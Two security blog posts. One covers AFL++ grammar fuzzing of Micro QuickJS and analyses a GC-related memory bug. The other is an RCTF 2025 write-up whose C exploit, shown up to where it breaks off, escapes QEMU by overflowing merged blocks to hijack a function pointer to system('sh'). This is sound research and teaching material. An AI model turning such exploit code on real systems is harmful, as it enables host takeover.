
AFL++ Grammar Level Fuzzing on Micro QuickJS

Author: rik
Date: 2026-01-20
Category: Binary Security

0. Motivation

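On 2025-12-23, legendary programmer Fabrice Bellard (original author of QEMU, FFmpeg, QuickJS, TCC...) released his new project Micro QuickJS (mqjs), a JavaScript engine for embedded systems. Since it is written in pure C, it probably has some memory-corruption bugs.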

1. Preparing the fuzzer

Components

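I decided to use AFL++ for fuzzing. Out of the box, AFL++ produces byte-level random inputs, and most of them are meaningless garbage (even with cmplog and similar features). For a language interpreter we want inputs that actually get executed. Compiler theory tells us that turning a human-readable string into executable bytecode or machine code takes at least three stages: lexical analysis, syntax analysis (parsing), and semantic analysis. Completely random input rarely gets past the lexer, let alone the parser and semantic analysis. If the generated inputs cannot run at all, we never reach the more valuable bugs in the VM and the GC (garbage collection, which frees memory).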

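Xidian University's School of Cyber Engineering offers compiler principles as a second-year elective. Its final project is to hand-write a compiler for a custom drawing language using nothing but the C standard library, which is great fun. Reportedly, though, the course is no longer offered starting with the class of 2024.
I feel that starting with LLVM passes would be of more practical value.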

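With Grammar-Mutator, however, we can do grammar-level fuzzing. We only need to supply the language's grammar productions, which are compiled automatically into a custom mutator. At runtime, AFL calls it to do four things: parse an existing seed into an AST, pick a random node in the AST, mutate that node into another node or subtree according to the productions, and finally generate code from the AST as a new seed. (See this article for details.)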
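The following toy C sketch illustrates that mutation step. It is not Grammar-Mutator's code or API. It assumes a made-up three-production arithmetic grammar and a hand-rolled LCG for reproducible randomness. It picks a random non-terminal node, regenerates that node's subtree from the grammar, and unparses the tree back into text.

```c
#include <assert.h>
#include <stdlib.h>

/* Toy grammar, for illustration only (not Grammar-Mutator's JS grammar):
 *   E -> D | E "+" E | "(" E ")"        D -> "0" | "1" | ... | "9"          */
typedef struct Node {
    int kind;                 /* 0: E -> D, 1: E -> E + E, 2: E -> ( E ) */
    char digit;
    struct Node *kid[2];
} Node;

static unsigned rng = 1;      /* fixed seed: reproducible runs */
static unsigned rnd(unsigned n) {
    rng = rng * 1103515245u + 12345u;
    return (rng >> 16) % n;
}

/* Expand the non-terminal E into a random subtree; depth bounds the recursion. */
static Node *gen_expr(int depth) {
    Node *n = calloc(1, sizeof *n);
    if (!n) abort();
    n->kind = depth <= 0 ? 0 : (int)rnd(3);
    if (n->kind == 0) n->digit = (char)('0' + rnd(10));
    if (n->kind >= 1) n->kid[0] = gen_expr(depth - 1);
    if (n->kind == 1) n->kid[1] = gen_expr(depth - 1);
    return n;
}

static void free_tree(Node *n) {
    if (!n) return;
    free_tree(n->kid[0]);
    free_tree(n->kid[1]);
    free(n);
}

/* Record the address of every pointer that holds an E node (up to cap of them). */
static void collect(Node **slot, Node **slots[], size_t *len, size_t cap) {
    if (*len < cap) slots[(*len)++] = slot;
    for (int i = 0; i < 2; i++)
        if ((*slot)->kid[i]) collect(&(*slot)->kid[i], slots, len, cap);
}

/* One mutation: pick a random E node and regenerate its subtree from the grammar. */
static void mutate(Node **root, int depth) {
    Node **slots[256];
    size_t len = 0;
    collect(root, slots, &len, 256);
    assert(len > 0);
    Node **victim = slots[rnd((unsigned)len)];
    free_tree(*victim);
    *victim = gen_expr(depth);
}

/* Append one character, always keeping buf NUL-terminated (cap must be >= 1). */
static void put(char c, char *buf, size_t *pos, size_t cap) {
    if (*pos + 1 < cap) buf[(*pos)++] = c;
    buf[*pos] = '\0';
}

/* Unparse the AST back into source text: this string becomes the new seed. */
static void unparse(const Node *n, char *buf, size_t *pos, size_t cap) {
    switch (n->kind) {
    case 0:
        put(n->digit, buf, pos, cap);
        break;
    case 1:
        unparse(n->kid[0], buf, pos, cap);
        put('+', buf, pos, cap);
        unparse(n->kid[1], buf, pos, cap);
        break;
    default:
        put('(', buf, pos, cap);
        unparse(n->kid[0], buf, pos, cap);
        put(')', buf, pos, cap);
        break;
    }
}
```

To use it, build a tree with gen_expr(3), call mutate(&t, 3) repeatedly, and unparse the result into a buffer. Every output is syntactically valid by construction, which byte-level mutation cannot guarantee.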

Of course, compiling with AddressSanitizer (-fsanitize=address) is indispensable. I also tried adding UBSan, but it blew up almost as soon as anything ran. Is there UB everywhere?

Bug fix

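At first, Grammar-Mutator would occasionally fail with _pick_non_term_node returns NULL and exit immediately. For some reason, in very rare cases it cannot find a non-terminal node that has a production usable for mutation.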

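When that happens, it should simply skip the mutation. Stopping the entire AFL run is hardly a good idea. Patching the code as follows is enough: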

diff --git a/src/tree_mutation.c b/src/tree_mutation.c
index 68e91f9..62da2ed 100644
--- a/src/tree_mutation.c
+++ b/src/tree_mutation.c
@@ -39,8 +39,10 @@ tree_t *random_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
+
+    return mutated_tree;
 
   }
 
@@ -203,9 +205,10 @@ tree_t *splicing_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
 
+    return mutated_tree;
   }
 
   node_t *parent = node->parent;

Running

Write a fuzzing harness for persistent mode, build the mutator library following Grammar-Mutator's official documentation, and let it generate the initial seeds. Then run AFL inside the aflplusplus/aflplusplus Docker container with these parameters:

while true; do AFL_DISABLE_TRIM=1 AFL_CUSTOM_MUTATOR_LIBRARY=./libgrammarmutator-javascript.so AFL_USE_ASAN=1 afl-fuzz -i seeds/ -o out/ -b 2 -a text -G 1024 -t 200 -S asan -- ./mjs_harness_asan; sleep 1; done
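The harness itself is not shown in this post. Below is a minimal sketch of a libFuzzer-style entry point, which AFL++ can drive in persistent mode. The 4 MiB per-input heap mirrors the 4194304-byte region in the ASan report in section 2. run_js is a HYPOTHETICAL placeholder for whatever mqjs calls the real harness makes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* 4 MiB engine heap, matching the 4194304-byte region seen in the ASan report. */
#define JS_HEAP_SIZE ((size_t)4 << 20)

/* HYPOTHETICAL placeholder for "create a context on `heap`, evaluate `src`, tear down".
   Replace with the real mqjs API calls; this stub only touches the buffers. */
static int run_js(void *heap, size_t heap_size, const char *src, size_t len) {
    assert(heap != NULL && heap_size > 0 && src[len] == '\0');
    memset(heap, 0, 64);  /* pretend to initialise the heap */
    return 0;
}

/* libFuzzer-style entry point, called once per input by the fuzzing driver. */
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    char *src = malloc(size + 1);       /* Grammar-Mutator emits text: NUL-terminate it */
    void *heap = malloc(JS_HEAP_SIZE);  /* fresh heap per input, so no state carries over */
    if (src && heap) {
        if (size) memcpy(src, data, size);
        src[size] = '\0';
        run_js(heap, JS_HEAP_SIZE, src, size);
    }
    free(heap);
    free(src);
    return 0;  /* libFuzzer convention: return 0 */
}
```

The harness is presumably built with afl-clang-fast and -fsanitize=fuzzer,address, which links AFL++'s libFuzzer-compatible driver. The LLVMFuzzerRunDriver frame in the ASan trace points that way.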

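Some lessons I learned while running it:

I disabled trimming, because for grammar-level fuzzing trimming tends to destroy complex structure, which makes it harder for later mutations to reach new branches.
A timeout is a good idea, but it should not be too low: slow seeds are often the more valuable ones (complex GC behavior).
Grammar-Mutator's AST-based mutation behaves like an unbounded-depth recursion, so the cycles counter barely increases. This is normal.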

2. Fuzzing results

After about 11 hours, the first batch of crashes appeared.

Crash id 000000 looked roughly like this:

var a = [];
var b = [];
var c = [];
var d = [];
(Infinity**((((a+(((((((((((((((((((((new Float64Array(0,0/0,0,{g: false})))))))))))))))))))))==(~0)))))));
function Float64Array(console, EvalError,Int16Array,Reflect,NaN){
new Float64Array(false,TypeError[[[((((((((((((((((((((((((((((((((((((((((((((((((((((d.concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat((((--b) >>> -0)),(((--b) >>> -0)),(((--b) >>> 
// not fully disclosed yet ...

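The input clearly contains unbounded recursion: it declares its own Float64Array function, which calls new Float64Array inside itself. It also contains a huge chain of concat calls. Together these put heavy allocation pressure on both the heap and the stack, which makes GC-related bugs likely.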

AddressSanitizer's verdict:

=================================================================
==1599335==ERROR: AddressSanitizer: negative-size-param: (size=-2112)
    #0 0x55f81ffe8449 in __asan_memmove (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f8200c1be2 in JS_MakeUniqueString /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:2032:5
    #2 0x55f8200aab94 in JS_ToPropertyKey /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:4193:16
    #3 0x55f8200aab94 in JS_Call /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:6009:28
    #4 0x55f82011a802 in JS_Run /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:11799:11
    #5 0x55f82003e19b in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:140:15
    #6 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #7 0x55f820038a38 in LLVMFuzzerRunDriver (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cea38) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #8 0x55f8200385c6 in main (/home/rik/Desktop/crashes/mjs_harness_asan+0x1ce5c6) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #9 0x7f24f4027634 in __libc_start_call_main /usr/src/debug/glibc/glibc/csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7f24f40276e8 in __libc_start_main /usr/src/debug/glibc/glibc/csu/../csu/libc-start.c:360:3
    #11 0x55f81feef3e4 in _start (/home/rik/Desktop/crashes/mjs_harness_asan+0x853e4) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

0x7f24f0c4f8b8 is located 327864 bytes inside of 4194304-byte region [0x7f24f0bff800,0x7f24f0fff800)
allocated by thread T0 here:
    #0 0x55f81ffeb905 in malloc (/home/rik/Desktop/crashes/mjs_harness_asan+0x181905) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f82003cee9 in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:112:21
    #2 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

SUMMARY: AddressSanitizer: negative-size-param (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4) in __asan_memmove
==1599335==

A negative size?

A while later, more than seven hundred further crashes had appeared, so I decided it was time to start analyzing them.

3. Analyzing the crashes

The GC in Micro QuickJS works as follows.

First, the whole heap is scanned, and the blocks to be freed are marked (JS_MTAG_FREE):

/* 'size' is in bytes and must be multiple of JSW and > 0 */
static void set_free_block(void *ptr, uint32_t size)
{
    JSFreeBlock *p;
    p = (JSFreeBlock *)ptr;
    p->mtag = JS_MTAG_FREE;
    p->gc_mark = 0;
    p->size = (size - sizeof(JSFreeBlock)) / sizeof(JSWord);
}

Then JS_GC2 reclaims memory with Jonkers' compaction algorithm (gc_compact_heap). Every block not tagged JS_MTAG_FREE is slid toward lower addresses, filling the holes left by the JS_MTAG_FREE blocks.

    /* pass 2: update the threaded pointers and move the block to its
       final position */
    new_ptr = ctx->heap_base;
    ptr = ctx->heap_base;
    while (ptr < ctx->heap_free) {
        gc_update_threaded_pointers(ctx, ptr, new_ptr);
        size = get_mblock_size(ptr);
        if (js_get_mtag(ptr) != JS_MTAG_FREE) {
            if (new_ptr != ptr) {
                memmove(new_ptr, ptr, size);
            }
            new_ptr += size;
        }
        ptr += size;
    }
    ctx->heap_free = new_ptr;
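To see what the pass-2 loop does to memory, here is a toy C sketch of just the sliding part. The block header layout (Hdr, TAG_LIVE, TAG_FREE) is an assumption made for the example, not mqjs's real layout. The pointer-threading updates that make this Jonkers' algorithm are deliberately left out.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Toy heap layout (an assumption, not mqjs's): every block starts with this header,
   and `size` counts the whole block in bytes, header included. */
enum { TAG_LIVE = 1, TAG_FREE = 2 };
typedef struct { uint32_t tag; uint32_t size; } Hdr;

/* Slide every non-free block toward heap_base (the "move" half of pass 2)
   and return the new heap_free. Pointer fix-ups are omitted. */
static uint8_t *compact(uint8_t *heap_base, uint8_t *heap_free) {
    uint8_t *ptr = heap_base, *new_ptr = heap_base;
    while (ptr < heap_free) {
        Hdr h;
        memcpy(&h, ptr, sizeof h);       /* copy the header first: memmove may overwrite it */
        assert(h.size >= sizeof h);      /* a zero size would loop forever */
        if (h.tag != TAG_FREE) {
            if (new_ptr != ptr)
                memmove(new_ptr, ptr, h.size);  /* regions may overlap */
            new_ptr += h.size;
        }
        ptr += h.size;
    }
    return new_ptr;
}

/* Helper: write a block with `payload` bytes of `fill`, return the next free byte. */
static uint8_t *put_block(uint8_t *p, uint32_t tag, uint32_t payload, uint8_t fill) {
    Hdr h = { tag, (uint32_t)sizeof(Hdr) + payload };
    memcpy(p, &h, sizeof h);
    memset(p + sizeof h, fill, payload);
    return p + h.size;
}
```

Live blocks only ever move down, so memmove is required: source and destination may overlap. The loop needs no extra memory.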

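The crucial point is that such a GC can move objects, so it must also update every reference to point to the object's new location. Object pointers that are not on the JS VM stack (for example, JS object pointers held in a bare C array) cannot be tracked, and they become dangling immediately. Code in mqjs therefore has to keep constant track of which functions may trigger a GC, and push temporaries onto the JS VM stack around such calls.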
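A toy model helps show why an unrooted pointer dangles. In the C sketch below, all names are hypothetical. Objects are ints addressed by slot index. The GC slides live objects down and fixes up only the references registered with push_root, which stands in for JS_PUSH_VALUE.

```c
#include <assert.h>
#include <stddef.h>

/* Toy moving heap. Liveness is a manual flag to keep the sketch short;
   a real GC would mark from the roots instead. */
#define HEAP_CAP 16
#define ROOT_CAP 8

static int heap[HEAP_CAP];
static int live[HEAP_CAP];
static size_t heap_top;
static size_t *roots[ROOT_CAP];   /* analogue of values pushed on the JS VM stack */
static size_t n_roots;

static void push_root(size_t *ref) { assert(n_roots < ROOT_CAP); roots[n_roots++] = ref; }
static void pop_root(void) { assert(n_roots > 0); n_roots--; }

static size_t alloc_obj(int value) {
    assert(heap_top < HEAP_CAP);
    heap[heap_top] = value;
    live[heap_top] = 1;
    return heap_top++;
}

/* Drop dead slots, slide live ones down, update ONLY the rooted references. */
static void gc(void) {
    size_t new_index[HEAP_CAP], dst = 0;
    for (size_t i = 0; i < heap_top; i++) {
        new_index[i] = dst;
        if (live[i]) {
            heap[dst] = heap[i];
            live[dst] = 1;
            dst++;
        }
    }
    for (size_t i = dst; i < heap_top; i++)
        live[i] = 0;
    for (size_t r = 0; r < n_roots; r++)
        *roots[r] = new_index[*roots[r]];
    heap_top = dst;
}
```

In a typical run, a rooted index still finds its value after gc(). An index kept only in a C local keeps its old value, which now points past the live heap or at a different object.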

Almost all of these hundreds of crashes come from overlooking a function that can trigger a GC. Take the crash from section 2:

static JSValue JS_MakeUniqueString(JSContext *ctx, JSValue val) {
    // ...
    
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    val1 = find_atom(ctx, &a, arr, ctx->unique_strings_len, val); 
    if (!JS_IsNull(val1))
        return val1;
    
    JS_PUSH_VALUE(ctx, val);
    is_numeric = js_is_numeric_string(ctx, val);
    JS_POP_VALUE(ctx, val);
    if (is_numeric < 0)
        return JS_EXCEPTION;
    
    /* not found: add it in the table */
    JS_PUSH_VALUE(ctx, val);
    new_tab = js_resize_value_array(ctx, ctx->unique_strings,
                                 ctx->unique_strings_len + 1);
    JS_POP_VALUE(ctx, val);
    if (JS_IsException(new_tab))
        return JS_EXCEPTION;
    ctx->unique_strings = new_tab;
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    memmove(&arr->arr[a + 1], &arr->arr[a],
            sizeof(arr->arr[0]) * (ctx->unique_strings_len - a));
    
    // ...
}

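JS_MakeUniqueString first searches ctx->unique_strings (find_atom) for an identical string. It gets the string's index a, or the position where the string should be inserted if it is absent. This is a common optimization: before creating any string, check a string table for a duplicate. If one exists, reuse it; otherwise allocate a new string and insert it into the table, so no memory is wasted on duplicates. However, ctx->unique_strings_len shrinks between find_atom and memmove, because part of the table is reclaimed by the GC. As a result, ctx->unique_strings_len - a becomes negative! (a should never exceed ctx->unique_strings_len.) Both js_is_numeric_string and js_resize_value_array can trigger a GC, mainly js_is_numeric_string.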
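The reported size=-2112 can be checked with a little arithmetic. The sketch assumes that unique_strings_len and a are ints, and that each table entry is an 8-byte word on this 64-bit build; the post does not show the types. Under those assumptions, an int difference of -264, converted to size_t and multiplied by 8, wraps to a size that ASan reads as -2112. The table therefore shrank by at least 264 entries between find_atom and memmove.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* ASSUMPTIONS: unique_strings_len and a are ints, and each table entry is one 8-byte
   word (64-bit build). Computes the memmove length the way the C expression would,
   then reinterprets it as signed, which is how ASan reports it. */
static ptrdiff_t memmove_len_as_signed(int unique_strings_len, int a) {
    assert(sizeof(size_t) == 8);
    /* A negative int difference converts to a huge size_t (modulo 2^64) ... */
    size_t n = sizeof(uint64_t) * (size_t)(unique_strings_len - a);
    /* ... which, read back as signed (wraps on GCC/Clang), is a small negative number. */
    return (ptrdiff_t)n;
}
```

For example, memmove_len_as_signed(100, 364) evaluates to -2112, while any a <= unique_strings_len gives a non-negative length.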

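Following the same reasoning, we can find other GC-related use-after-free bugs, some of them even exploitable. In fact, we can patch mqjs to run a GC before every memory allocation. This uncovers such bugs far more efficiently than waiting for AFL to stumble on seeds that create GC pressure. (This should be a generally applicable trick.)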
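Below is a minimal sketch of such a stress switch. The context and allocator are HYPOTHETICAL, since mqjs's real allocation path is not shown here. When gc_stress is set, every allocation first runs a collection. A GC-unsafe call site then fails on its first execution, rather than only under rare heap pressure.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>

/* HYPOTHETICAL engine context and hooks; only the pattern matters here. */
typedef struct {
    bool gc_stress;               /* force a collection before every allocation */
    unsigned gc_runs;
} Ctx;

static void gc_collect(Ctx *ctx) {
    ctx->gc_runs++;               /* a real engine would mark and compact here */
}

/* Stand-in for the engine allocator (a real engine allocates from its own heap). */
static void *engine_alloc(Ctx *ctx, size_t size) {
    if (ctx->gc_stress)
        gc_collect(ctx);          /* every allocation site becomes a GC point */
    void *p = malloc(size);
    assert(p != NULL);
    return p;
}
```

In practice, one would guard the switch with a compile-time flag, so that only the fuzzing build pays the considerable slowdown.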

4. Exploitation

...

5. Fix

For the crash from section 2, a simple fix is to call find_atom again right before the memmove, to recompute the insertion position. Also, js_is_numeric_string should not need O(n) space.
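The suggested fix can be sketched on a simplified sorted table. In this C sketch, Table, insert_unique and drop_last_entry are hypothetical stand-ins for ctx->unique_strings and the GC. The key point is that the insertion index is recomputed with find_slot after the call that may shrink the table, instead of reusing the stale index.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Sorted table of word-sized keys: a HYPOTHETICAL stand-in for ctx->unique_strings. */
typedef struct { uint64_t *arr; size_t len; } Table;

/* Binary search: index of key if present (*found = 1), else its insertion point. */
static size_t find_slot(const Table *t, uint64_t key, int *found) {
    size_t lo = 0, hi = t->len;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (t->arr[mid] < key) lo = mid + 1;
        else hi = mid;
    }
    *found = lo < t->len && t->arr[lo] == key;
    return lo;
}

/* Simulated GC for the example: reclaims the last entry, shrinking the table. */
static void drop_last_entry(Table *t) { if (t->len > 0) t->len--; }

/* Insert key if absent. maybe_gc models a call that can shrink the table, like
   js_is_numeric_string / js_resize_value_array. A GC only removes entries. */
static int insert_unique(Table *t, uint64_t key, void (*maybe_gc)(Table *)) {
    int found;
    find_slot(t, key, &found);
    if (found)
        return 0;
    if (maybe_gc)
        maybe_gc(t);                       /* t->len may shrink here */
    uint64_t *p = realloc(t->arr, (t->len + 1) * sizeof *p);
    if (!p)
        return -1;
    t->arr = p;
    size_t a = find_slot(t, key, &found);  /* the fix: recompute after the GC point */
    assert(a <= t->len);
    memmove(&t->arr[a + 1], &t->arr[a], (t->len - a) * sizeof t->arr[0]);
    t->arr[a] = key;
    t->len++;
    return 1;
}
```

Suppose a simulated GC drops the tail entry. Reusing the pre-GC index, which equals the old length, would then yield the same negative-length memmove seen in section 2.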

...

The same approach also finds meaningful bugs in QuickJS-NG.

RCTF 2025 bbox Writeup

Author: rik
Date: 2025-12-16
Category: Binary Security

RCTF 2025 pwn. After mstr, here is a reproduction of bbox, a relatively simple QEMU escape. If I have time, I will also look at the v8 pwn. (No promises.)

Challenge

In the attached Docker archive, qemu-system-x86_64 implements a custom PCI device, virtsec-device. With the help of AI, the two key structs can be recovered quickly:

00000000 struct block // sizeof=0x18
00000000 {
00000000     unsigned int id;
00000004     unsigned int size;
00000008     unsigned int _pad1;
0000000C     unsigned int offset;
00000010     unsigned int _pad2;
00000014     unsigned __int8 encrypted;
00000015     unsigned __int8 valid;
00000016     unsigned __int8 _pad3[2];
00000018 };

00000000 struct virtsec_device // sizeof=0x10E8
00000000 {
00000000     unsigned __int8 _pad0[3024];
00000BD0     unsigned int status;
00000BD4     unsigned int session_id;
00000BD8     unsigned int error_code;
00000BDC     unsigned __int8 _pad1[32];
00000BFC     unsigned int alloc_size;
00000C00     unsigned int _pad2[2];
00000C08     struct block blocks[16];
00000D88     unsigned int _pad3;
00000D8C     unsigned int current_id;
00000D90     unsigned int merge_id1;
00000D94     unsigned int merge_id2;
00000D98     unsigned __int8 data[256];
00000E98     void (*func_ptr)(void *);
00000EA0     void *func_arg;
00000EA8     unsigned __int8 _pad4[256];
00000FA8     unsigned __int8 key_buffer[256];
000010A8     unsigned int reg_10A8;
000010AC     unsigned __int8 _pad6[36];
000010D0     unsigned __int64 reg_10D0;
000010D8     unsigned __int64 reg_10D8;
000010E0     unsigned __int64 reg_10E0;
000010E8 };
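The recovered layout can be sanity-checked in C. The sketch below transcribes the two structs with fixed-width types, assuming x86-64 alignment rules. It uses static_assert to confirm that func_ptr and func_arg sit directly after the 256-byte data buffer. That placement is what lets a block larger than 256 bytes reach them.

```c
#include <assert.h>   /* static_assert (C11) */
#include <stddef.h>
#include <stdint.h>

/* Transcription of the recovered structs; offsets assume x86-64 (LP64) alignment. */
struct block {
    uint32_t id, size, _pad1, offset, _pad2;
    uint8_t encrypted, valid, _pad3[2];
};

struct virtsec_device {
    uint8_t _pad0[3024];
    uint32_t status, session_id, error_code;
    uint8_t _pad1[32];
    uint32_t alloc_size;
    uint32_t _pad2[2];
    struct block blocks[16];
    uint32_t _pad3, current_id, merge_id1, merge_id2;
    uint8_t data[256];
    void (*func_ptr)(void *);
    void *func_arg;
    uint8_t _pad4[256];
    uint8_t key_buffer[256];
    uint32_t reg_10A8;
    uint8_t _pad6[36];
    uint64_t reg_10D0, reg_10D8, reg_10E0;
};

static_assert(sizeof(struct block) == 0x18, "block is 0x18 bytes");
static_assert(offsetof(struct virtsec_device, blocks) == 0xC08, "blocks at 0xC08");
static_assert(offsetof(struct virtsec_device, data) == 0xD98, "data at 0xD98");
static_assert(offsetof(struct virtsec_device, func_ptr) ==
              offsetof(struct virtsec_device, data) + 256, "func_ptr follows data");
static_assert(sizeof(struct virtsec_device) == 0x10E8, "device is 0x10E8 bytes");
```

Assuming block 0 starts at data[0], offset 256 of an oversized block 0 is func_ptr. That is why read_data64(256) in the exploit below leaks the printf pointer.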

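After that, reversing is fairly easy. The device manages 16 blocks in a 256-byte space. Each block is initially at most 0x10 bytes, but the merge command can combine two or more blocks, up to 256 bytes. The device also has a gift register. After anything is written to it, the device stores a printf function pointer and a string pointer right after data in the device struct. Triggering gift again calls the former with the latter as its first argument. (There are also sessions, a mysterious command 3 and XOR encryption/decryption; I am not sure what they are for.)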

The PCI device is driven via MMIO. Vendor ID 0x1234 and Device ID 0x5678 can be found in virtsec_class_init. Inside the QEMU guest, run lspci to find the PCI resource path (00:04.0 Class 0580: 1234:5678).

The challenge author thoughtfully logs every operation. To see the qemu_log output while debugging, add the QEMU command-line options -d guest_errors -D qemu.log (qemu_loglevel_mask_64(2048) corresponds to LOG_GUEST_ERROR).

Bug

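The problem is in block merging. merge does not seem to check lengths at all. If we allocate more than 16 blocks and merge them together, we easily get a block larger than 256 bytes, which gives out-of-bounds read/write access to the gift fields. virtsec_free_block hints at a UAF, but there probably is not one.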
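Here is a simplified C model of the missing check. Blk, merge_unchecked and merge_checked are hypothetical, and the real device also moves data and offsets around. Merging sixteen 0x10-byte blocks into one already fills all 256 bytes. Merging a seventeenth block yields 0x110 bytes, which a size check against the data buffer would have rejected.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define DATA_SIZE 256u   /* size of virtsec_device.data */
#define NUM_BLOCKS 16u
#define BLOCK_MAX 0x10u  /* largest size a freshly allocated block may have */

/* HYPOTHETICAL simplified block: only what matters for the size arithmetic. */
typedef struct { uint32_t size; bool valid; } Blk;

/* What the device appears to do: add the sizes without any bound check. */
static uint32_t merge_unchecked(Blk *dst, Blk *src) {
    assert(dst != src && dst->valid && src->valid);
    dst->size += src->size;
    src->valid = false;   /* slot reusable afterwards, as the exploit's re-alloc suggests */
    return dst->size;
}

/* What it should do: refuse merges that would not fit in data[]. */
static bool merge_checked(Blk *dst, Blk *src) {
    if (dst->size + src->size > DATA_SIZE)
        return false;
    merge_unchecked(dst, src);
    return true;
}
```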

Exploit

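We just need to change the function pointer to system and the argument to "sh". However, for some mysterious reason, writing directly to offset 256 crashes QEMU outright (?).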

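Merging naturally copies the data as well, though. So instead, we first write the two values into a small block and then overwrite the gift fields through the out-of-bounds merge. Surprisingly, blocks can only be freed by resetting everything, so we have to redo all the merges.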

I do not quite understand why "welcome to RCTF2025!This is my gift!hello" is printed again after the escape. Maybe it is a pwntools quirk.

Exp:

#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

#define REG_CMD 0x0C
#define REG_ID 0x14
#define REG_SIZE 0x18
#define REG_MERGE1 0x30
#define REG_MERGE2 0x34
#define REG_GIFT 0x38

#define CMD_SESSION 1
#define CMD_ALLOC 2
#define CMD_SELECT 3
#define CMD_MERGE 4
#define CMD_RESET 6

int fd;
volatile uint8_t *mmio_ptr; // byte pointer: arithmetic on void * is a GNU extension

static void write_reg32(int offset, uint32_t value) {
    *(volatile uint32_t *)(mmio_ptr + offset) = value;
}

static void trig_gift() { write_reg32(REG_GIFT, 0xcafebabe); }

// static void new_session() { write_reg32(REG_CMD, CMD_SESSION); }

static void alloc_blk(uint32_t id, uint32_t size) {
    write_reg32(REG_ID, id);
    write_reg32(REG_SIZE, size);
    write_reg32(REG_CMD, CMD_ALLOC);
}

static void select_blk(uint32_t id) {
    write_reg32(REG_ID, id);
    // write_reg32(REG_CMD, CMD_SELECT);
}

static void merge_blk(uint32_t id1, uint32_t id2) {
    write_reg32(REG_MERGE1, id1);
    write_reg32(REG_MERGE2, id2);
    write_reg32(REG_CMD, CMD_MERGE);
}

static void dev_res() { write_reg32(REG_CMD, CMD_RESET); }

static uint32_t read_data32(size_t offset) {
    return *(volatile uint32_t *)(mmio_ptr + 0x1000 + offset);
}

static uint64_t read_data64(size_t offset) {
    uint32_t low32 = read_data32(offset);
    uint32_t high32 = read_data32(offset + 4);
    return ((uint64_t)high32 << 32) | low32;
}

static void write_data32(size_t offset, uint32_t data) {
    *(volatile uint32_t *)(mmio_ptr + 0x1000 + offset) = data;
}

static void write_data64(size_t offset, uint64_t data) {
    write_data32(offset, (uint32_t)data);
    write_data32(offset + 4, (uint32_t)(data >> 32));
}

int main(void) {
    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR);
    if (fd < 0) {
        perror("open");
        exit(EXIT_FAILURE);
    }
    puts("[*] Device opened.");
    mmio_ptr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mmio_ptr == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    puts("[*] MMIO mmaped.");

    // new_session();
    for (size_t i = 0; i < 16; ++i) {
        alloc_blk(i, 0x10);
    }
    puts("[*] Blocks allocated.");
    for (size_t i = 1; i < 16; ++i) {
        merge_blk(0, i);
    }
    puts("[*] Blocks merged.");
    alloc_blk(1, 0x10);
    merge_blk(0, 1);
    puts("[+] Block merged overflow.");

    trig_gift();
    select_blk(0);
    size_t host_system_addr =
        read_data64(256) - 0xf980;                    // glibc system - printf
    size_t host_sh_addr = host_system_addr - 0x38761; // glibc "sh" - system
    printf("[+] Host `system` address: 0x%zx\n", host_system_addr);
    printf("[+] Host `\"sh\"` address: 0x%zx\n", host_sh_addr);

    dev_res();
    puts("[*] Reset.");
    for (size_t i = 0; i < 16; ++i) {
        alloc_blk(i, 0x10);
    }
    puts("[*] Blocks allocated.");
    for (size_t i = 1; i < 16; ++i) {
        merge_blk(0, i);
    }
    puts("[*] Blocks merged.");
